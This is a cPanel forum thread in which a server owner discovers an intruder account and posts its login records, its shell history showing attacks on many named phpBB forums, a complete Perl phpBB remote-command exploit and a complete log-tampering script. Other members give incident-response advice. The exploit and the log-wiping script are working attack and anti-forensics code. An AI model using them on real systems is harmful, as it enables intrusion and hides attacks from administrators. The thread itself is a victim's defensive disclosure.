The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Unknown Root Access

Discussion in 'General Discussion' started by viooltje, Jul 20, 2007.

  1. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    My root acces alert suddenly changed from this:

    Root Access ALERT on: Fri Jul 6 02:12:27 CEST 2007 root pts/1 Jul 6 02:12 (a80-126-105-31.adsl.xs4all.nl)

    to this:

    Root Access ALERT on: Sat Jul 21 02:03:49 CEST 2007 cristi pts/0 Jul 19 16:14 (86.55.185.229)

    ??

    Who or what is a cristi?

    then I tried again I got this:
    (a80-126-105-31.adsl.xs4all.nl)

    Root Access ALERT on: Sat Jul 21 03:33:18 CEST 2007 cristi pts/0 Jul 19 16:14 (86.55.185.229) root pts/2 Jul 21 03:33 (a80-126-105-31.adsl.xs4all.nl)

    who or what is cristi? A hacker?

    How do I remove this cristi?
     
  2. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    root@silent [~]# last
    root pts/0 a80-126-105-31.a Sat Jul 21 03:56 still logged in
    root pts/0 a80-126-105-31.a Sat Jul 21 03:46 - 03:53 (00:07)
    root pts/0 a80-126-105-31.a Sat Jul 21 03:43 - 03:46 (00:02)
    root pts/2 a80-126-105-31.a Sat Jul 21 03:37 gone - no logout
    root pts/2 a80-126-105-31.a Sat Jul 21 03:33 - 03:37 (00:04)
    root pts/2 a80-126-105-31.a Sat Jul 21 03:19 - 03:33 (00:13)
    cristi pts/1 86.55.185.229 Fri Jul 20 14:27 - 15:20 (00:53)
    cristi pts/0 86.55.185.229 Thu Jul 19 16:14 - 03:43 (1+11:29)
    cristi pts/0 86.55.185.229 Thu Jul 19 15:52 - 16:10 (00:17)
    cristi pts/0 89.32.42.170 Tue Jul 17 00:22 - 01:57 (01:34)
    cristi pts/1 89.32.42.170 Mon Jul 16 18:19 - 18:50 (00:30)
    cristi pts/0 89.32.42.170 Mon Jul 16 18:17 - 19:11 (00:54)
    cristi pts/0 89.32.42.170 Mon Jul 16 11:24 - 12:02 (00:38)
    root pts/2 a80-126-105-31.a Fri Jul 13 01:53 - 01:54 (00:00)
    root pts/0 a80-126-105-31.a Thu Jul 12 02:58 - 03:11 (00:13)
    cristi pts/0 86.127.243.160 Wed Jul 11 23:57 - 00:08 (00:11)
    cristi pts/0 86.127.243.160 Wed Jul 11 12:05 - 14:29 (02:23)
    cristi pts/3 86.127.243.134 Tue Jul 10 22:22 - 02:54 (04:31)
    cristi pts/3 89.32.42.170 Tue Jul 10 22:12 - 22:13 (00:01)
    cristi pts/3 86.127.243.134 Tue Jul 10 16:58 - 21:09 (04:10)
    cristi pts/3 86.127.243.134 Tue Jul 10 15:01 - 15:22 (00:21)
    root pts/0 a80-126-105-31.a Mon Jul 9 23:41 - 01:39 (01:58)
    reboot system boot 2.6.9-55.0.2.ELs Mon Jul 9 23:39 (11+04:26)
    root pts/1 a80-126-105-31.a Mon Jul 9 22:39 - 22:43 (00:03)
    root pts/1 a80-126-105-58.a Mon Jul 9 19:49 - 20:18 (00:29)
    root pts/0 a80-126-105-58.a Mon Jul 9 19:03 - 19:56 (00:53)
    root pts/0 a80-126-105-31.a Sun Jul 8 03:41 - 04:19 (00:38)
    root pts/1 a80-126-105-31.a Sat Jul 7 00:28 - 00:32 (00:03)
    root pts/1 a80-126-105-31.a Fri Jul 6 02:12 - 02:29 (00:17)
    root pts/0 a80-126-105-31.a Thu Jul 5 01:34 - 02:39 (01:04)
    root pts/0 a80-126-105-31.a Thu Jul 5 01:25 - 01:28 (00:02)
    root pts/0 a80-126-105-31.a Thu Jul 5 00:02 - 01:24 (01:21)
    root pts/0 a80-126-105-31.a Wed Jul 4 22:56 - 23:56 (01:00)
    reboot system boot 2.6.9-55.0.2.ELs Wed Jul 4 22:55 (16+05:10)
    root pts/0 a80-126-105-31.a Tue Jul 3 22:44 - 23:19 (00:34)

    cristi account has accessed my system
    how can I get to know what this account is doing in my system
    is there a command to retrieve history list of the other user?
    is there a coomand to see when this account has been created?

    any help would be welcome thnx allot.
     
  3. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    :( You have been hacked. What they did will take some time to find out. More than one IP was used so either there is more than one person or they are using something else to access your system.

    If you can, take the machine offline and start digging. Be sure to isolate any backups from the server so they cannot delete them.

    At very least look at the main password files to see if they added accounts and check /home to see if new folders have been made, but you have a ton of other things to check out.
     
  4. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    #1184853141
    cd /lib/fbi
    #1184853259
    ./f www.darkdeed.net/phpBB/
    #1184853607
    cat /home/cristi/.bash_history
    #1184853618
    ./f joeys.clanwar.hu/
    #1184853656
    > /home/cristi/.bash_history
    #1184853659
    ./f joeys.clanwar.hu/
    #1184853664
    cat /home/cristi/.bash_history
    #1184934451
    nc -l -p 8000 -vv
    #1184854460
    cd /lib/fbi
    #1184934308
    ./f www.sandharlanden.net/lan/forum/
    #1184934390
    ./f augu.twbbs.org/phpBB2/
    #1184934691
    ./f augu.twbbs.org/phpBB2/
    #1184934695
    ./f www.japania.org/foorumi/
    #1184934908
    ./f naniwa.starryhometown.net/forum/
    #1184934961
    ./f smallville.andyweb.net/forum/
    #1184935055
    ./f smallville.andyweb.net/forum/
    #1184951957
    netstat -aut
    #1184951970
    ps -ax
    #1184952010
    netatat- ait
    #1184952015
    netstat -aut
    #1184952069
    nice
    #1184954518
    dyweb.net/forum/
    #1184954520
    ./f smallville.andyweb.net/forum/
    #1184954608
    ./f forum.ioche.it/
    #1184954637
    ./f forum.ioche.it/
    #1184954745
    ./f forum.ioche.it/
    #1184954792
    ./f smallville.andyweb.net/forum/
    #1184954876
    ./f smallville.andyweb.net/forum/
    #1184961835
    ./f www.ourtradingclub.com/forum/
    #1184961887
    ./f www.scribbly.net/forum/
    #1184961934
    ./f www.tmetz.net/forums/
    #1184962444
    ./f www.thegrumpystrumpet.com/brassrail/
    #1184962504
    ./f www.jcpbook.com/phpbbX/
    #1184962552
    ./f home.exetel.com.au/getinfo/connect/forum/
    #1184962632
    ./f www.youngrepublicanclub.net/bb/
    #1184985536
    w
    #1184985543
    netstat -aut
    #1184985646
    locate lord
    #1184985652
    cd /home
    #1184985652
    ls
    #1184985656
    cd /var/ww
    #1184985660
    cd /var/www
    #1184985661
    ls
    #1184985664
    cd html
    #1184985664
    ls
    #1184985668
    cd ..
    #1184985669
    cd ..
    #1184985670
    uname -a

    this is what he did what should I do now?
     
  5. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    he got a /home/cristi while a dir called.ssh
    which includes a key:

    61.59.108.23 ssh-dss AAAAB3NzaC1kc3MAAACBAMT8zkopk+Wu+uZRRi0DxUqyN4fbaJ4...................iaOYv0v2jrjyR+iw0/M19Xwb/IsU/7LmHw=

    that's how he accessed I think.

    how lame to hack a cheap unsecured one man machine!!
     
  6. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    userdel cristi
    userdel: user cristi is currently logged in

    huh? what now?
     
  7. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    Judging from your "last" command he was in several times over the last week or so. Sometimes for over an hour.

    I think he loaded something on port 8000 using netcat to test it first.

    But your list of commands here is likely to only be a small chunk of what he did during all that time.

    You really need to isolate this machine and start digging. Worst case scenario you have to reload the O/S and reload good backups.
     
  8. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    h23-61-59-108.chinup.com.tw is where he most likely resides. Hacking any machine gives them alot of power, if he truly owns the box he can make it do anything for free and you get the blame.

    :(
     
  9. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    Which person or company should I hire to solve this problem?
     
  10. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    If you do not own the machine you might contact your ISP/HOST and they might help you for free, but most likely they will tell you to reload the O/S and the backups of everything.

    However when thats done you will be back to the point right before you got hacked, so you would need to find out what let them in.
     
  11. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    836
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    I too think you should start fresh. That's just based on reading these forums for a couple of years. I only have experience with configserver.com (user chirpy here) for paid services of the sort you need, and have been very happy with them. I'm sure there are other users here that are good too, but I can only personally recommend them.

    Good luck.
     
  12. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    How can I know if he really gained root acces?
     
  13. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,446
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    Click a few of the links in your post above. Those sites look hacked to me. Your server has been compromised. Time for a reload. All hope is lost on this one I believe.

    Got backups?

    Good luck. :(
     
  14. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,446
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    One more tip, you might want to move all of these forums over to something a bit more secure like SMF forums. phpbb is like a screendoor on a submarine.
     
  15. lehels

    lehels Well-Known Member

    Joined:
    Jul 10, 2006
    Messages:
    90
    Likes Received:
    0
    Trophy Points:
    6
    Someone who "speaks" the Unix~ language,

    Don't forget a firewall!
    Change usual ssh port,

    Keep on eye your intruder, precisly deny all unwanted access,

    G.luck,
     
  16. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    what does this:
    ./f www.darkdeed.net/phpBB/

    he is using this code in the f file:
    perl a -u http://$1 -L z3c3v3 -P fbiteam -i 2


    and allot scripts containing this code:

    #!/usr/bin/perl

    use LWP::UserAgent;
    use Getopt::Std;
    use HTTP::Cookies;

    getopts("u:L:P:i:p:eek::");

    $url = $opt_u;
    $login = $opt_L;
    $password = $opt_P;
    $id = $opt_i || 2;
    $prefix = $opt_p || 'phpbb_';
    $proxy = $opt_o;

    if(!$url || !$login || !$password){&usage;}

    $|++;

    $xpl = LWP::UserAgent->new() or die;
    $cookie_jar = HTTP::Cookies->new();
    $xpl->cookie_jar( $cookie_jar );
    $xpl->proxy('http'=>'http://'.$proxy) if $proxy;
    $ids = 'IDS:r57 phpBB2 exploit a2e2#20022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
    $res = $xpl->post($url.'login.php',
    [
    "username" => "$login",
    "password" => "$password",
    "autologin" => "on",
    "admin" => "1",
    "login" => "Log in",
    ],"User-Agent" => "$ids");
    $cookie_jar->extract_cookies($res);
    if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }
    while ()
    {
    print "by Alexander for FbiTeam\n";
    print "Command for execute or 'exit' for exit # ";
    while(<STDIN>)
    {
    $cmd=$_;
    chomp($cmd);
    exit() if ($cmd eq 'exit');
    last;
    }
    &run($cmd);
    }

    sub run($)
    {
    $sql = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
    &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);
    $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
    @result = split(/\n/,$res->content);
    $data = '';
    $on = $start = $end = 0;
    for (@result)
    {
    if (/_END_/) { $end = 1; last; }
    if ($on) { $data .= $_."\n"; }
    if (/_START_/) { $on = 1; $start = 1; }
    }
    if($start&&$end) { print $data."\r\n"; }
    }

    sub phpbb_sql_query($$){
    $res = $xpl->post("$_[0]",
    Content_type => 'form-data',
    Content => [
    perform => 'restore',
    restore_start => 'Start Restore',
    backup_file => [
    undef,
    '0wneeeeedddd',
    Content_type => 'text/plain',
    Content => "$_[1]",
    ],
    ]
    ,"User-Agent" => "$ids");
    }

    sub usage()
    {
    print "\\=--------------------------------------=/\r\n";
    print "| phpBB admin2exec exploit by Alexander |\r\n";
    print "| version 2 (user_sig_bbcode_uid) |\r\n";
    print "/=--------------------------------------=\\\r\n";
    print "\r\n Usage: a [OPTIONS]\r\n\r\n";
    print " Options:\r\n";
    print " -u - path to forum e.g. http://site/f...)\r\n"; exit(); } ??? phpbb hacker?
     
  17. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    At least. I mean he has full access to your computer so for now he is launching phpbb exploit attacks. Given enough time he will turn your machine into a super hacking server.
     
  18. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    Hacked and more found zxc-Antilog c0ded By [ Alexander ] (WhiteHat.ro)

    Hacked and more found zxc-Antilog c0ded By [ Alexander ] (WhiteHat.ro)

    Can't find anything on google nor in the forums someone know something about this stuff?

    found this in the 'anti.pdf' file:

    #!/bin/bash
    #
    # zxc-Antilog V 0.1
    #
    # usage : to Exchanging your IP with fake IP at your choice
    #
    # and to clear your last command's and clear logout history
    #
    # Remember that...
    #
    # Whitehat 2006
    #
    #
    clear
    echo "--------------------------------------------------------------------------------------------------------------------"
    echo " zxc-Antilog c0ded By [ Alexander ] (WhiteHat.ro) - zxcpoi@WhiteHat.ro "
    echo "--------------------------------------------------------------------------------------------------------------------"
    if [ "$UID" = "0" ];then
    echo " h3re w3 g0 "
    else
    echo " `whoami` y0 must be login by root"
    fi
    echo -n " What's the ip y0 want to spoof it ? "
    read word
    word=$word
    echo -n " What's the Fake ip y0 want using it ? "
    read fake
    fake=$fake
    r0x="yes"
    if [ ! -f /var/log/lastlog ]; then
    r0x="no"
    echo " i can't find lastlog"
    fi
    if [ "$r0x" = "yes" ]; then
    echo " Editing lastlog"
    sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
    mv /var/log/lastlog.new /var/log/lastlog
    fi
    syslog="yes"
    if [ ! -f /var/log/syslog ]; then
    echo " i can't find syslog"
    syslog="no"
    fi
    if [ "$syslog" = "yes" ]; then
    echo " Editing syslog"
    sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
    mv /var/log/syslog.new /var/log/syslog
    fi
    mess="yes"
    if [ ! -f /var/log/messages ]; then
    echo " i can't find message "
    mess="no"
    fi
    if [ "$mess" = "yes" ]; then
    echo " Editing message"
    sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
    mv /var/log/messages.new /var/log/messages
    fi
    http="yes"
    if [ ! -f /var/log/httpd/access_log ]; then
    echo " i can't find access_log "
    http="no"
    fi
    if [ "$http" = "yes" ]; then
    echo " Editing access_log"
    sed "s/$word/$fake/g" /var/log/httpd/access_log > /var/log/httpd/access_log.new
    mv /var/log/httpd/access_log.new /var/log/httpd/access_log
    fi
    httpd="yes"
    if [ ! -f /var/log/httpd/error_log ]; then
    echo " i can't find error_log "
    httpd="no"
    fi
    if [ "$httpd" = "yes" ]; then
    echo " Editing error_log "
    sed "s/$word/$fake/g" /var/log/httpd/error_log > /var/log/httpd/error_log.new
    mv /var/log/httpd/error_log.new /var/log/httpd/error_log
    fi
    wtmp="yes"
    if [ ! -f /var/log/wtmp ]; then
    echo " i can't find wtmp "
    wtmp="no"
    fi
    if [ "$wtmp" = "yes" ]; then
    echo " Editing wtmp "
    sed "s/$word/$fake/g" /var/log/wtmp > /var/log/wtmp.new
    mv /var/log/wtmp.new /var/log/wtmp
    fi
    secure="yes"
    if [ ! -f /var/log/secure ]; then
    echo " i can't find secure "
    secure="no"
    fi
    if [ "$secure" = "yes" ]; then
    echo " Editing secure "
    sed "s/$word/$fake/g" /var/log/secure > /var/log/secure.new
    mv /var/log/secure.new /var/log/secure
    fi
    xferlog="yes"
    if [ ! -f /var/log/xferlog ]; then
    echo " i can't find xferlog "
    xferlog="no"
    fi
    if [ "$xferlog" = "yes" ]; then
    echo " Editing xferlog "
    sed "s/$word/$fake/g" /var/log/xferlog > /var/log/xferlog.new
    mv /var/log/xferlog.new /var/log/xferlog
    fi
    utmp="yes"
    if [ ! -f /var/run/utmp ]; then
    echo " i can't find utmp "
    utmp="no"
    fi
    if [ "$utmp" = "yes" ]; then
    echo " Editing utmp "
    sed "s/$word/$fake/g" /var/run/utmp > /var/run/utmp.new
    mv /var/run/utmp.new /var/run/utmp
    fi
    echo -n " if y0 want to delete the last commands type (yes) if y0 don't type (no) 0r anything "
    read command
    if [ "$command" = "yes" ]; then
    echo "##Now the last commands y0 put it will go to hell ^_^ ##"
    echo -n > ~/.bash_history
    history -c
    echo -n " y0 have one minute to exit from server..go0d luck "
    /etc/init.d/atd start
    echo "sed 's/$word/$fake/g' /var/run/utmp > /var/run/utmp.new" | at now + 1 minute
    echo "mv /var/run/utmp.new /var/run/utmp" | at now + 2 minute
    echo " zxc-Antilog Ended work... Cheers ! "
    exit 0
    else
    echo -n " y0 have one minute to exit from server..go0d luck "
    /etc/init.d/atd start
    echo "sed 's/$word/$fake/g' /var/run/utmp > /var/run/utmp.new" | at now + 1 minute
    echo "mv /var/run/utmp.new /var/run/utmp" | at now + 2 minute
    echo " zxc-Antilog Ended work... Cheers ! "
    exit 0
    fi
     
  19. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    Your system was rooted yesterday, isnt that right ?. Expect to find more and more stuff until you restore the machine and block out whatever is letting them in.
     
  20. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    You need to get that server off the network and the internet. The longer it is up the more damage is done. Let alone because your server has been compromised you are putting others at risk of an attack from your server.

    Take it offline, and start rebuilding and closing the holes.
     
Loading...

Share This Page